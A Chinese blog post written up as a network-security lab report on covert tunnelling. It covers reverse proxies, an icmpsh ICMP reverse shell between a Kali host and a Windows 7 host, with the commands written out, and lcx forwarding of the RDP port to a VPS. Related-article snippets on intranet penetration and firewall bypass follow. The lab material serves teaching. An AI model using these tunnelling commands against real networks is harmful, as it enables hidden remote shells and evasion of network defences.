构建隐藏通信隧道

于 2024-10-15 11:33:34 发布
阅读量972 收藏 19
点赞数 23
分类专栏: 网络攻击与防范 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_59151049/article/details/142941224
版权

实验目的与要求

实验目的

通过实验能够描述并运用网络层、传输层、应用层和SOCKS代理隧道技术。

实验要求

(1)理解反向代理,能够描述反向代理;

(2)理解网络层隧道,能够描述并运用网络层隧道技术;

(3)理解传输层隧道,能够描述并运用传输层隧道技术;

(4)理解应用层隧道,能够描述并运用应用层隧道技术;

(5)理解SOCKS代理,能够描述并运用SOCKS代理。

实验原理与内容

实验原理

(1)简述反向代理原理

反向代理是一种网络技术,用于在服务器端接收客户端请求,并将这些请求转发到内部网络的其他服务器上。其原理如下:

客户端发送请求:客户端向反向代理服务器发送请求,这个请求可能是访问网站、下载文件或执行其他网络操作。

反向代理接收请求:反向代理服务器接收到客户端的请求。

请求转发:反向代理服务器根据配置的规则,将请求转发到内部网络的一个或多个后端服务器上。

后端服务器处理请求:后端服务器接收到请求后,执行相应的操作,比如处理网页请求、生成动态内容、提供文件下载等。

响应返回:后端服务器生成响应,并将响应发送给反向代理服务器。

反向代理返回响应:反向代理服务器接收到后端服务器的响应后,将其发送回客户端。

反向代理的主要作用是隐藏了真实的后端服务器,客户端只与反向代理通信,无法直接访问后端服务器。这提供了安全性和负载均衡的优势。在安全方面,反向代理可以防止直接暴露后端服务器的 IP 地址和其他敏感信息,从而减少攻击风险。在负载均衡方面,反向代理可以根据负载情况将请求分发到多个后端服务器上,以提高性能和可靠性

实验内容

  1. 通过实例描述网络层隧道技术
  2. 通过实例描述传输层隧道技术
  3. 通过实例描述应用层隧道技术
  4. 通过实例描述SOCKS代理

实验过程与结果

  1. 通过实例描述网络层隧道技术

第一步首先在kali上安装impacket

在kali安装搭建icmpsh,并使用sysctl -w net.ipv4.icmp_echo_ignore_all=1

在icmpsh文件下使用./icmpsh_m.py 2.2.2.10 2.2.2.111,然后转到win7

然后查看本机ip,进入icmpsh下使用icmpsh.exe -t 2.2.2.10 -d 500 -b 30 -s 128转回kali查看

发现在kali终端已经进入win7cmd,然后输入whoami按图示来操作可获得win7IP信息

通过实例描述传输层隧道技术

在kali安装lcx_vuln.cn安装完成以后使用以下命令进行授权

端口映射

在目标机器上执行如下命令,将目标机器3389端口的所有数据转发到公网VPS3333端口上。

在kali终端输入rdesktop 2.2.2.10:2222

通过实例描述应用层隧道技术

重启ssh

观察端口是否打开

通过实例描述SOCKS代理

⭐️Web安全之构建可信任的合作环境
AI天才研究院
08-06 1289
随着互联网信息化、云计算物联网技术的普及,网络安全越来越成为重中之重要。而Web安全又是信息安全的一种重要组成部分,也是最容易被忽视的环节。在这个大的主题下,我们要谈如何构建可信任的合作环境,让Web安全从简单的防火墙演进到更加复杂的攻击面分析预防手段。构建可信任的合作环境至关重要。首先,需要搞清楚我们的目标。我们的目标不仅仅是保护用户隐私信息,更重要的是建立起互信信任。基于互信信任建立的基础上,才能建立起专业的沟通机制,实现信息共享协同工作。其次,要保证我们的技术能力能力规模。
内网渗透测试:隐藏通讯隧道技术(下)
weixin_43733912的博客
11-03 746
系列文章: 内网渗透测试:隐藏通讯隧道技术(上) 什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,将还原后的数据包发送到相应服务器上。 上一节中,我们讲解了网络层隧道技术(IPv6 隧道、ICMP 隧道
内网渗透--建立隐藏通信隧道
Beret-81的博客
11-30 528
内网渗透--建立隐藏通信隧道
隐藏通信隧道技术
qq_43590351的博客
08-30 5484
渗透中内网隧道的建立。
内网渗透基石篇--隐藏通信隧道技术(下)
qq_44005305的博客
07-31 218
内网隐藏通信隧道就学到这里了,中间参考了一些大佬的思路。中途做了几个实验,用来学习一些常用工具的使用,工具只有在使用的时候我觉得理解的更快啊![外链图片转存中…(img-xXBlvC00-1690719460220)]4. 利用bitsadmin上传YY6 03.7.6 利用powershell 上传bitsadmin 可以用来在windows 命令行下下载文件。bitsadmin是 windows 后台智能传输服务的一个工具,windows的自动更新,补丁之类的下载就是用这个工具来实现的。
内网渗透之隐藏通信隧道
focus on security
06-22 2630
前言 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,将还原后的数据包发送到相应服务器上。 一、隐藏通信隧道基础知识 隧道 隧道技术是一种通过使用互联网络的基本设施在网络之间传递数据的方式,使用隧道传递的数据(或负载)可以是不同
IP隧道与VPN技术:构建安全、跨网络通信通道
在实际应用中,IP隧道技术通常用于在公共网络上通过加密封装技术建立安全的通信隧道,以实现私密的数据传输。 ### IP隧道的工作原理 IP隧道技术通过将需要传输的数据包封装在外层协议的数据包中,然后通过公共...
电信设备-利用4G移动通信协议层特性构建隐蔽信道的方法.zip
09-18
本资料主要探讨了如何利用4G移动通信协议层的特性来构建隐蔽信道,这种技术在网络安全、信息隐藏以及潜在的非法活动中有一定应用。 4G移动通信协议主要包括以下几个层次: 1. 物理层(PHY):这一层负责将数据转换...
Linux下IPv6隧道技术的配置及安全性.pdf
09-06
双栈技术要求设备同时运行IPv4IPv6协议栈,而隧道技术则通过将IPv6数据包“隐藏”在IPv4包内来实现通信,透明转换技术则通常涉及网关设备对数据包的转换。 在IPv6隧道技术中,有两种常见的隧道类型:手工配置的...
内网渗透-隐藏通信隧道技术
qq_44806973的博客
12-05 1811
隐藏隧道技术基础知识什么是隧道判断内网连通性网络层隧道技术IPv6 隧道 基础知识   一般的网络通信,先在两台机器之间建立TCP连接,再进行正常通信。知道IP地址可直接发送报文。不知道IP地址,就需要将域名解析成IP(DNS)。 什么是隧道   这里的隧道,就是绕过端口屏蔽的方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙与其通信。被封装的数据包到达目的地后,将数据包还原,将还原后的数据包发送给响应服务器。   常见的隧道网络层:IPv6隧道、ICMP隧道、GR
横向移动:隐藏通信隧道技术_网络层.(遨游于 内网任何主机)
网络安全领域___专研者.
04-29 3819
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,将还原后的数据包发送到相应的服务器上。
横向移动:隐藏通信隧道技术_传输层.(遨游于 内网任何主机)
网络安全领域___专研者.
04-30 3180
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,将还原后的数据包发送到相应的服务器上。
内网渗透基石篇-- 隐藏通信隧道技术(上)
dzqxwzoe的博客
08-21 1228
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,将还原后的数据包发送到相应服务器上。内网隧道基础上就到这里了,在本文中简单做了几个实验,都很基础,用来理解基础知识刚刚好。
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5862
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
黑客10种绕过防火墙方法
03-20 9006
SSL/TLS隧道:SSL(Secure Sockets Layer)/TLS(Transport Layer Security)隧道是通过SSL/TLS协议建立的安全通信隧道,用于在客户端服务器之间建立加密的通信连接。在分段攻击中,攻击者通过发送特制的网络数据包,利用目标系统对数据包的处理逻辑漏洞,实现对目标系统的攻击。中间人攻击:攻击者将自己的IP地址伪装成受害者或者目标服务器的IP地址,从而使得通信的两端都误以为与对方直接通信,而实际上数据包都经过了攻击者的中间节点,攻击者窃取或篡改通信内容。
71内网安全-域横向网络&传输&应用层隧道技术
san3144393495的博客
01-01 1571
代理隧道技术的区别?代理主要解决的是网络访问问题,隧道是对过滤的绕过,隧道技术是为了解决什么解决被防火墙一些设备,ids(入侵检测系统)进行拦截的东西进行突破,举个栗子;在实战情况可能会csmsf没有办法上线或者得到回显,出口数据被监控,在拖数据的时候会被拦截,网络通信存在问题等;隧道技术前期必备的条件?应用场景四已经获得了一些控制权,但是不能对肉鸡进行信息收集等一些执行功能;比如利用shior反序列化得到了一些权限,但是漏洞上有ids,把后门放到了对方服务器但是cs上不了线,
隐藏隧道通信Socks 隧道
f_carey的博客
09-03 2036
郑重声明: 本笔记编写目的只用于安全知识提升,与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明谐。 内网安全之:Socks 隧道1 Socks 隧道原理2 实验环境2.1 客户端配置2.2 服务端配置2.3 利用 Socks 隧道代理扫描内网主机 1 Socks 隧道原理 socks 是一种代理服务,可以说是一个升级版的 lcx。 Sockssocks 4 socks 5 两种类型,socks 4 .
ICMP隧道搭建原理
最新发布
01-07
### ICMP 隧道的工作原理 ICMP (Internet 控制消息协议) 主要用于在网络设备之间传递控制信息错误报告。由于许多防火墙默认允许 ICMP 流量通过,这使得攻击者可以利用 ICMP 数据包来创建隐蔽通道,即所谓的 ICMP 隧道。 #### 工作机制 ICMP隧道的核心在于封装技术。通常情况下,正常的ICMP数据报只携带少量的信息,如回显请求或应答。但在构建ICMP隧道时,攻击者会将其他类型的网络流量(例如TCP/IP通信)嵌入到ICMP负载中[^1]。当这些被修改过的ICMP数据包到达目标主机后,专门设计的应用程序能够解析提取原始的数据流,从而实现绕过某些安全措施的目的。 #### 实现细节 为了建立一个有效的ICMP隧道,至少需要两部分组件: - **客户端软件**:负责发送带有隐藏有效载荷的ICMP Echo Request(Type 8),将接收到的标准Echo Reply中的内容解码还原成实际传输的数据。 - **服务器端应用**:接收来自互联网上的ICMP Echo Requests,从中抽取真实意图传达的消息;之后再构造相应的响应——通常是标准形式的Echo Replies(Type 0),其中包含了返回给发起者的反馈信息。 这种做法依赖于双方都安装有特定版本的支持该功能的应用层工具。此外,还需要注意的是,在现代网络安全环境中,越来越多的企业级防护系统已经开始加强对异常模式下的ICMP活动监测力度,因此纯粹依靠传统方法实施此类操作的成功率正在逐渐降低[^2]。 ```bash # 这里展示了一个简单的命令行示例,用来测试基本的ICMP连通性, # 不是真正的ICMP隧道代码。 ping -c 4 example.com ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴某

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值